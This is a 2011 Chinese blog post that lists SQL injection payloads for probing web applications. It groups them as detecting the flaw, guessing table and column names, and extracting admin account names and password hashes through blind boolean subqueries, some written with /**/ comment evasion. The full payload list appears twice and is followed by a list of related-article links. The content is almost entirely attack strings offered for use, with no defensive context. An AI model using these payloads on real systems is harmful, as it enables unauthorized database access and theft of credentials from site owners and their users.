黄聪:SQL注入代码实例。如何使用SQL注入检查漏洞、猜测数据库表明、列名、帐号密码
2011-07-16 11:13
609 查看
检查漏洞
1' or 1=1 or ('1' = '1
1' or 1=1) or '1' = '1
1' or 1=1 or '1' = '1
1'/**/or/**/1=1/**/or/**/'1'= '1
猜表名
1' or 0<(select count(*) from admin) and '1' = '1
1'/**/or/**/0<(select/**/count(*)/**/from/**/user)/**/and/**/'1'='1
1'/**/or/**/0<(select/**/count(*)/**/from/**/guanliyuan)/**/and/**/'1'='1
猜列名
1' or 0<(select top 1 count(*) from admin where len(id)>0) and '1' = '1
1' or 0<(select top 1 count(*) from admin where len(name)>0) and '1' = '1
1' or 0<(select top 1 count(*) from admin where len(username)>0) and '1' = '1
猜帐号
1' or 1<(select top 1 count(*) from admin where len(name)>3 and id =1) and '1' = '1
1' or 1<(select top 1 count(*) from admin where name = 'XXX' ) and '1' = '1
猜帐号
1' or 1=1 and (select top 1 abs(asc(mid(name,1,1))) from admin)>12635 and '1' = '1
1' or 1<(select top 1 count(*) from admin where len(userpass)=16) and '1' = '1
1' or 1<(select top 1 count(*) from admin where id > 1 and len(userpass)>0) and '1' = '1
1' or 1<(select top 1 count(*) from admin where userpass like '321665453993bc2a') and '1' = '1
1' or 0<(select top 1 count(*) from admin where id = 3) and '1' = '1 正确
1' or 0<(select top 1 count(*) from admin where id = 3 and name = 'XXX') and '1' = '1
1' or 0<(select top 1 count(*) from admin where id = 3 and name = 'XXX' and userpass = '123665453993bc2a') and '1' = '1
1' or 1=1 or ('1' = '1
1' or 1=1) or '1' = '1
1' or 1=1 or '1' = '1
1'/**/or/**/1=1/**/or/**/'1'= '1
猜表名
1' or 0<(select count(*) from admin) and '1' = '1
1'/**/or/**/0<(select/**/count(*)/**/from/**/user)/**/and/**/'1'='1
1'/**/or/**/0<(select/**/count(*)/**/from/**/guanliyuan)/**/and/**/'1'='1
猜列名
1' or 0<(select top 1 count(*) from admin where len(id)>0) and '1' = '1
1' or 0<(select top 1 count(*) from admin where len(name)>0) and '1' = '1
1' or 0<(select top 1 count(*) from admin where len(username)>0) and '1' = '1
猜帐号
1' or 1<(select top 1 count(*) from admin where len(name)>3 and id =1) and '1' = '1
1' or 1<(select top 1 count(*) from admin where name = 'XXX' ) and '1' = '1
猜帐号
1' or 1=1 and (select top 1 abs(asc(mid(name,1,1))) from admin)>12635 and '1' = '1
1' or 1<(select top 1 count(*) from admin where len(userpass)=16) and '1' = '1
1' or 1<(select top 1 count(*) from admin where id > 1 and len(userpass)>0) and '1' = '1
1' or 1<(select top 1 count(*) from admin where userpass like '321665453993bc2a') and '1' = '1
1' or 0<(select top 1 count(*) from admin where id = 3) and '1' = '1 正确
1' or 0<(select top 1 count(*) from admin where id = 3 and name = 'XXX') and '1' = '1
1' or 0<(select top 1 count(*) from admin where id = 3 and name = 'XXX' and userpass = '123665453993bc2a') and '1' = '1
相关文章推荐
- 黄聪:如何不用插件使用代码调用Wordpress中的随机文章。
- 如何使用参数化查询防止Sql注入漏洞
- 使用spring jdbc template简化jdbc数据库操作实例代码
- 黄聪:如何使用CodeSmith批量生成代码(原创系列教程)
- python 7-6 如何使用描述符对实例属性做类型检查,分别实现set,方法,在set内使用isinstance做类型检查
- [转]黄聪:如何使用CodeSmith批量生成代码
- 黄聪:如何使用CodeSmith批量生成代码(原创系列教程)
- yii2中结合gridview如何使用modal弹窗实例代码详解
- 一段代码,SQL注入猜解数据库用户密码
- 黄聪:如何使用CodeSmith批量生成代码(原创系列教程)
- 黄聪:如何使用CodeSmith批量生成代码(原创系列教程)
- [转] 在使用水晶报表时数据库登录对话框,要求输入登录密码啊?是怎么回事啊,如何解决?
- 解决如何使用opengl超级宝典中实例代码及shared文件夹里的库
- 源程序List1.java,展示了如何使用list()方法来检查一个目录的内容的实例
- 如何使用ORACLE自带的HR实例数据库?
- 如何使用PLSQL添加用户和密码,登录时可以免输入密码 PLSQL配置新数据库连接
- 黄聪:如何使用CodeSmith批量生成代码(原创系列教程)
- 黄聪:如何使用CodeSmith批量生成代码(原创系列教程)